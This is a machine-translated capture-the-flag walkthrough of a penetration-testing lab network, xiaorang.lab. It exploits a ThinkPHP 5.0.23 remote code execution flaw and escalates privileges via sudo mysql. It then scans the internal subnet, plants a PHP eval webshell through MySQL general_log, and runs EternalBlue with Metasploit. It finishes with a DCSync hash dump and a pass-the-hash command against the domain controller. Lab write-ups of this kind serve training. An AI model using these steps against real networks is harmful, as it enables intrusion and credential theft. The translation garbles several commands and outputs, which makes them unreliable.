.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
ターゲットマシンをオンにした後、ThinkPHPアイコンを備えたログインインターフェイスがあります。直接テストするだけです
が存在します5.0.23 RCE
、PHP-7.4.3の環境を確認しましょう。Disable_Functionsをご覧ください
pcntl_alarm、pcntl_fork、pcntl_waitpid、pcntl_wait、pcntl_wifexited、pcntl_wifstopped、pcntl_wifsignaled、 pcntl_wifcontinued、pcntl_weexitstatus、pcntl_wtermsig、pcntl_wstopsig、pcntl_signal、pcntl_signal_get_ha ndler、pcntl_signal_dispatch、pcntl_get_last_error、pcntl_strerror、pcntl_sigprocmask、pcntl_sigwaitinfo、pcntl_sigtimedwait、pcntl_exec、pcntl_getpriority、pcntl_setpriority、pcntl_asynciment
トランスミッションはすぐに、アリの剣の接続はwww-data許可です。
以前に従った公式アカウントの下でいくつかの記事を見つけました。 Web Security Toolsライブラリは非常に完全な《Linux提权备忘录》です
許可を与えられている猫/などを試してみてください。
このウェブサイトはコマンドの標高のリファレンスを提供できます
は、mysql、sudo mysql -e 'を使用して実装できます! cat /root/flag/flag01.txt 'フラグの最初の部分を取得します
ifconfigチェックIP
fscanをパスアップしてセクションC、/FSCAN_AMD64 -H 172.22.1.1/24でスキャンして、結果は現在のresult.txtになりました。
172.22.1.18:3306オープン
172.22.1.2:88オープン
172.22.1.21:445オープン
172.22.1.18:445オープン
172.22.1.2:445オープン
172.22.1.21:139オープン
172.22.1.18:139オープン
172.22.1.2:139オープン
172.22.1.21:135オープン
172.22.1.18:135オープン
172.22.1.2:135オープン
172.22.1.18:80オープン
172.22.1.15:80オープン
172.22.1.15:22オープン
[*] 172.22.1.2(Windows Server 2016 Datacenter 14393)
[+] 172.22.1.21 MS17-010(Windows 7 Professional 7601サービスパック1)
[+] NetInfo:
[*] 172.22.1.21
[ - ] Xiaorang-Win7
[ - ] 172.22.1.21
[+] NetInfo:
[*] 172.22.1.18
[ - ] Xiaorang-OA01
[ - ] 172.22.1.18
[+] NetInfo:
[*] 172.22.1.2
[ - ] DC01
[ - ] 172.22.1.2
[*] 172.22.1.2 [+] DC Xiaorang \ DC01 Windows Server 2016 DataCenter 14393
[*] webtitle:3333333333333:200 code:200 len:5578 title33:bootstrapマテリアル管理者
[*] 172.22.1.18 Xiaorang \ Xiaorang-OA01 Windows Server 2012 R2 DataCenter 9600
[*] 172.22.1.21 __msbrowse __ \ xiaorang-win7 Windows7 Professional 7601サービスパック1
[*] webtitle:333333333333:3:302 len:0 title:NoneジャンプURL: 3http://172.22.1.18?M=ロギー
[*] webtitle:3333333333333333http://172.22.1.18?M=Login Code:200 LEN3:4012 Title:Signコールコラボレーションオフィスシステム
[+] http://172.22.1.15 POC-YAML-THINKPHP5023-METHOD-RCE POC1
.15は見る必要はありません。21は永遠の青の存在を伴うWin7、18はOAを呼び出すシステムであり、2はドメインコントロールです
NPS+Proxifier Proxyを使用した転送、最初に.18を見てください
それを行うには2つの方法があります。 1つ目は、コールOAのファイルアップロード脆弱性をターゲットにすることです。 Master Y4Tackerの記事を参照できます。弱いパスワードadmin/admin123を使用してログインし、Expを入力してください。
2番目の方法は、 /phpmyAdminを使用して直接ルート /ルートをログインし、ログを使用してWebShellに書き込むことです。
最初のステップは、「一般%」のようなショー変数を実行することです。ログが有効になっているかどうかを確認し、保存されているログの場所を確認します
秒ステップSET GLOBAL general_log=on;ログをオンにします
3番目のステップは、ログ保存場所を設定するためにグローバルgeneral_log_fileを設定します
最後に '?php eval($ _ post [cmd]);
次に、21はWin7マシンです。 MS17-010に電話することができます。試した後、ネットワークを離れることはできません。フォワードモニタリングを使用できます。
最初にプロキシをハングアップし、Proxychains MSFConsoleをSocks5トラフィックに移動し、次にExploit/Windows/SMB/MS17_010_ETERNALBLUE=SET PAYLOAD WINDOWS/X64/METERPRETER/BIND_TCP_UUID=SET RHOSTS 172.22.1.21=ExploitiTloit
正のメータープレターシェルを取得した後、次のステップはDCSYNCを使用することです
DCSYNCの導入については、この記事を参照できます。最大の機能は、ドメインコントロールにログインせずにドメイン制御に関するデータを取得できることです。
KiwiをMSFの下に直接ロードし、その後Kiwi_cmd 'lsadump3:3360dcsync /domain:xiaorang.lab /all /csv' exitエクスポートハッシュハッシュをドメイン内のすべてのユーザーに対してハッシュします。
は.2の前にスキャンされ、445ポートを開きます。 SMBハッシュを使用して、Kaliに付属のCrackMapexecで直接渡します。プロキシチャインCrackmapexec SMB 172.22.1.2 -U管理者-H 10CF89A850FB1CDBE6BB432B859164C8 -D XIAORANG.LAB -X '$ CMD'
オリジナルリンク:http://119.45.47.125/index.php/2022/11/24/yunjing-4/